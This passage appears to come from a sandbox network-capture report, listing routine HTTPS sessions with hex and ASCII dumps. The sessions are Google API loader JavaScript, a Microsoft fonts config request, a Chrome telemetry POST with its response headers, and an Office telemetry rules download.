                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC465INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC1378INData Raw: 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: type)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC1378INData Raw: 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 73 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.assi
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC1378INData Raw: 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 74 3a 68
                                                                                                                                                                                                                                                                                                                                Data Ascii: nction(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l||(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),reject:h
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC1378INData Raw: 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: omise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=functi
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC1378INData Raw: 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28
                                                                                                                                                                                                                                                                                                                                Data Ascii: ("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c|0,d.length));for(
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC1378INData Raw: 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return thi
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC1378INData Raw: 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 73 2e 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();this.s
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC1378INData Raw: 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: .entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)ret
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:14 UTC1378INData Raw: 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 29
                                                                                                                                                                                                                                                                                                                                Data Ascii: 216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0||e>1114111||e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(e)


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                5192.168.2.549724184.28.90.27443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:15 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:15 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=143659
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:15 GMT
                                                                                                                                                                                                                                                                                                                                Content-Length: 55
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:15 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                6192.168.2.549727172.217.18.1104431436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:15 UTC726OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: play.google.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Content-Length: 904
                                                                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:15 UTC904OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 30 31 34 39 33 33 32 36 38 38 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                                                                Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1730149332688",null,null,null,
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:15 UTC936INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                                                                Set-Cookie: NID=518=YeqEdoDexMsR5kwDaQPFmQpCRUtU8tFT_Rps4oaN2kLyrF0WLLUvOPLg6sA-6RHbnVPNIbtRY_N1dZa095F9xDKw7N15rassd5-O3k8-8B2zbMgmQpIk3O6gaFz8rFLuckB7uky9rmll4EcbuIfjmib2UPSxhUnnsJ7BNRE_JyspnB-ncA; expires=Tue, 29-Apr-2025 21:02:15 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:15 GMT
                                                                                                                                                                                                                                                                                                                                Server: Playlog
                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:02:15 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:15 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                7192.168.2.54973513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:17 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:18 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:18 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                Content-Length: 218853
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public
                                                                                                                                                                                                                                                                                                                                Last-Modified: Sun, 27 Oct 2024 10:35:44 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DCF6731CF80310"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 89d6c6b8-201e-0033-2798-28b167000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210218Z-15b8d89586f4zwgbgswvrvz4vs00000006tg00000000exz3
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:18 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
